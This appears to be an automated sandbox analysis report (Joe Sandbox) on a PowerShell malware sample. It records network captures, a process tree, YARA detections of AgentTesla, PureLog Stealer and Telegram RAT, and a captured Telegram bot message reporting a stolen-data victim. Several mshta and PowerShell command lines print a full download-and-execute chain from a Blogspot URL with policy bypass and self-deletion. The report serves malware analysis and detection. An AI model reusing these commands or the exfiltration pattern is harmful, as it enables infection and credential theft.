                                                                                                                          {"ok":true,"result":{"message_id":276,"from":{"id":6350883303,"is_bot":true,"first_name":"CPA_APRIL_24_bot","username":"CPA_APRIL_24_bot"},"chat":{"id":6444969864,"first_name":"Duke","last_name":"Habibi","username":"niggaman007","type":"private"},"date":1714064488,"document":{"file_name":"user-226546 2024-04-25 22-40-58.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIBFGYqjGgM9NOQ80v4zUnlSoi8AwqGAALrFQACCn1YUdgK5qAuBMy4NAQ","file_unique_id":"AgAD6xUAAgp9WFE","file_size":289},"caption":"New CO Recovered!\n\nTime: 04/25/2024 22:40:58\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 185.152.66.230","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.549739142.251.15.1324437876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-25 17:01:41 UTC176OUTGET /haha HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                          Host: minecap4-22-24.blogspot.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-04-25 17:01:41 UTC434INHTTP/1.1 301 Moved Permanently
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Location: /atom.xml
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:41 GMT
                                                                                                                          Expires: Thu, 25 Apr 2024 17:01:41 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-04-25 17:01:41 UTC224INData Raw: 64 61 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 2f 61 74 6f 6d 2e 78 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                                                                                          Data Ascii: da<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="/atom.xml">here</A>.</BODY></HTML>
                                                                                                                          2024-04-25 17:01:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.549740142.251.15.1324437876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-25 17:01:42 UTC156OUTGET /atom.xml HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                          Host: minecap4-22-24.blogspot.com
                                                                                                                          2024-04-25 17:01:42 UTC570INHTTP/1.1 200 OK
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Server: blogger-renderd
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:42 GMT
                                                                                                                          Expires: Thu, 25 Apr 2024 17:01:43 GMT
                                                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                          Last-Modified: Mon, 22 Apr 2024 17:27:39 GMT
                                                                                                                          Content-Type: application/atom+xml; charset=UTF-8
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Age: 0
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-04-25 17:01:42 UTC685INData Raw: 35 61 31 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 61 74 6f 6d 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3f 3e 3c 66 65 65 64 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 35 2f 41 74 6f 6d 27 20 78 6d 6c 6e 73 3a 6f 70 65 6e 53 65 61 72 63 68 3d 27 68 74 74 70 3a 2f 2f 61 39 2e 63 6f 6d 2f 2d 2f 73 70 65 63 2f 6f 70 65 6e 73 65 61 72 63 68 72 73 73 2f 31 2e 30 2f 27 20 78 6d 6c 6e 73 3a 62 6c 6f 67 67 65 72 3d 27 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 67
                                                                                                                          Data Ascii: 5a1<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.g
                                                                                                                          2024-04-25 17:01:42 UTC768INData Raw: 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 66 65 65 64 73 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 65 6c 66 27 20 74 79 70 65 3d 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 66 65 65 64 73 2f 33 34 30 38 34 33 37 37 30 35 34 39 33 33 38 34 33 37 38 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 3f 61 6c 74 3d 61 74 6f 6d 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 6c 74 65 72 6e 61 74 65 27 20 74 79 70 65 3d 27 74 65 78 74 2f 68 74 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f
                                                                                                                          Data Ascii: s://minecap4-22-24.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom'/><link rel='alternate' type='text/html' href='https://minecap4-22-24.blogspo


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:19:00:56
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1"
                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:1
                                                                                                                          Start time:19:00:56
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:4
                                                                                                                          Start time:19:01:18
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                          Imagebase:0xfe0000
                                                                                                                          File size:45'984 bytes
                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:19:01:18
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                          Imagebase:0x370000
                                                                                                                          File size:45'984 bytes
                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:6
                                                                                                                          Start time:19:01:18
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                          Imagebase:0x730000
                                                                                                                          File size:32'768 bytes
                                                                                                                          MD5 hash:3A77A4F220612FA55118FB8D7DDAE83C
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:7
                                                                                                                          Start time:19:01:19
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                          Imagebase:0x580000
                                                                                                                          File size:32'768 bytes
                                                                                                                          MD5 hash:3A77A4F220612FA55118FB8D7DDAE83C
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:19:01:19
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
                                                                                                                          Imagebase:0x770000
                                                                                                                          File size:91'216 bytes
                                                                                                                          MD5 hash:84C42D0F2C1AE761BEF884638BC1EACD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:9
                                                                                                                          Start time:19:01:19
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
                                                                                                                          Imagebase:0xd20000
                                                                                                                          File size:91'216 bytes
                                                                                                                          MD5 hash:84C42D0F2C1AE761BEF884638BC1EACD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:10
                                                                                                                          Start time:19:01:19
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:dw20.exe -x -s 792
                                                                                                                          Imagebase:0x10000000
                                                                                                                          File size:36'264 bytes
                                                                                                                          MD5 hash:89106D4D0BA99F770EAFE946EA81BB65
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:11
                                                                                                                          Start time:19:01:19
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:dw20.exe -x -s 788
                                                                                                                          Imagebase:0x10000000
                                                                                                                          File size:36'264 bytes
                                                                                                                          MD5 hash:89106D4D0BA99F770EAFE946EA81BB65
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:14
                                                                                                                          Start time:19:01:22
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
                                                                                                                          Imagebase:0x7ff6363e0000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:15
                                                                                                                          Start time:19:01:22
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:16
                                                                                                                          Start time:19:01:22
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:18
                                                                                                                          Start time:19:01:31
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          Imagebase:0x7ff7e52b0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:19
                                                                                                                          Start time:19:01:31
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
                                                                                                                          Imagebase:0x7ff6363e0000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:22
                                                                                                                          Start time:19:01:39
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
                                                                                                                          Imagebase:0x7ff6363e0000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:23
                                                                                                                          Start time:19:01:40
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:24
                                                                                                                          Start time:19:01:40
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:26
                                                                                                                          Start time:19:01:47
                                                                                                                          Start date:25/04/2024
                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
                                                                                                                          Imagebase:0x7ff6363e0000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Reset < >
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4']q$TJbq$TJbq$Te]q$paq$xb`q
                                                                                                                            • API String ID: 0-2757515195
                                                                                                                            • Opcode ID: 56de76f0be7a6ec4fab8a403b0945086a9ce1d6d86fc0b22890271d02d3372fb
                                                                                                                            • Instruction ID: b1ea00fa16da6d2ad8991cbc848416cec10cb9130bc42747be41cd58e811044b
                                                                                                                            • Opcode Fuzzy Hash: 56de76f0be7a6ec4fab8a403b0945086a9ce1d6d86fc0b22890271d02d3372fb
                                                                                                                            • Instruction Fuzzy Hash: BA522435A005159FDB19DF68C984E69BBF2FF88304F5981A8E60A9B376CB31EC41CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 33a1ba386ed0315d1bda2db5cdf86f9580a259778f24ebdf2a6b0a941950d231
                                                                                                                            • Instruction ID: 107e88434b17a6b8dc2b4a8fcad97c48f6721360a636592af456eb6b9dd258fd
                                                                                                                            • Opcode Fuzzy Hash: 33a1ba386ed0315d1bda2db5cdf86f9580a259778f24ebdf2a6b0a941950d231
                                                                                                                            • Instruction Fuzzy Hash: D661BE31A08110CFD7119B2CC408778FAA2BB80731F5989B6D45A9F3DEDB79DC468B56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 11e619d2e2fd7a416acf9f559bc5a8a16e50a946bd506c44d69b2c7c1f36e3d4
                                                                                                                            • Instruction ID: 54be1ea58c3acef80407ae35d3c9f506a67fd1e1e72b6ddafe3b8f380146cb13
                                                                                                                            • Opcode Fuzzy Hash: 11e619d2e2fd7a416acf9f559bc5a8a16e50a946bd506c44d69b2c7c1f36e3d4
                                                                                                                            • Instruction Fuzzy Hash: 0031F630A05209AFDB15EFB8EC146EFBBBAEB41304F904159D506AB388DE345D098F92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 41729a6f630dfeae2afe64d377a8957ce4cb93c33b6a1fc8b41a03878a5f1ee2
                                                                                                                            • Instruction ID: 28cf9a89a0ed8df5b63842d7a7dbaab2b432bb9bae9e3f0fe58fedbe94ac4652
                                                                                                                            • Opcode Fuzzy Hash: 41729a6f630dfeae2afe64d377a8957ce4cb93c33b6a1fc8b41a03878a5f1ee2
                                                                                                                            • Instruction Fuzzy Hash: 7F31CF709053498FDB06DFB8D9506EEBBB6FF85300F4080AAE141AB266DB345D09CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c96927786e4e37f23adac21910acb69e3842119da511f0e07e034056459b1d40
                                                                                                                            • Instruction ID: 0412d42d9e28941d8585d9466f25d9df7d5b311a5708b6851aa784108caf237c
                                                                                                                            • Opcode Fuzzy Hash: c96927786e4e37f23adac21910acb69e3842119da511f0e07e034056459b1d40
                                                                                                                            • Instruction Fuzzy Hash: 12212630A042868FCB45EF78DC546AEBB71EB51310F9044A9C5059B249EE349E49CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c6c7c194d98de53ee288f6a5501f42cd7f66fce904a4d5a7b525f1953f600757
                                                                                                                            • Instruction ID: 315442862f1764f1f889091cb84c74a31f2955e86f8cd57f137e16d02e50a5ee
                                                                                                                            • Opcode Fuzzy Hash: c6c7c194d98de53ee288f6a5501f42cd7f66fce904a4d5a7b525f1953f600757
